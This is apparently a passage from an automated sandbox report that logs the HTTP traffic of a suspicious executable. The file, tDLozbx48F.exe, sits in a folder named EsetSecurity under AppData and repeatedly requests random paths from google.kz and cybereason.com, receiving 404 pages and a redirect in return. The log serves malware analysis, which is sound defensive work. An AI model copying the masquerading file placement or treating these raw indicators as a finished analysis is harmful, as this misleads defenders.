Dec 1, 2024 22:52:07.243685961 CET	50	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Dec 1, 2024 22:52:07.363850117 CET	450	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Data Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 [TRUNCATED] Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.16	49756	172.217.19.164	80	5204	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:52:07.633332968 CET	50	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.16	49757	172.217.19.164	80	5204	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:52:07.635953903 CET	50	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.16	49758	45.60.107.106	80	5204	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:52:07.648715019 CET	80	OUT	GET /de2GhgMoGn?s=144 HTTP/1.1 Host: cybereason.com Connection: Keep-Alive
Dec 1, 2024 22:52:08.813530922 CET	123	IN	HTTP/1.1 301 Moved Permanently Location: https://cybereason.com/de2GhgMoGn?s=144 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.16	49761	172.217.19.164	80	5204	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:52:09.026369095 CET	50	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Dec 1, 2024 22:52:10.581478119 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:10 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:10.581494093 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:10.581955910 CET	50	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Dec 1, 2024 22:52:10.701978922 CET	500	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Data Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 [TRUNCATED] Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Dec 1, 2024 22:52:11.182193995 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:10 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:11.182327032 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:11.368545055 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:11 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:11.368638039 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:11.468679905 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:11 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:11.468822002 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:11.569526911 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:11 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:11.569547892 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:11.669838905 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:11 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:11.669898033 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:11.770629883 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:11 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and 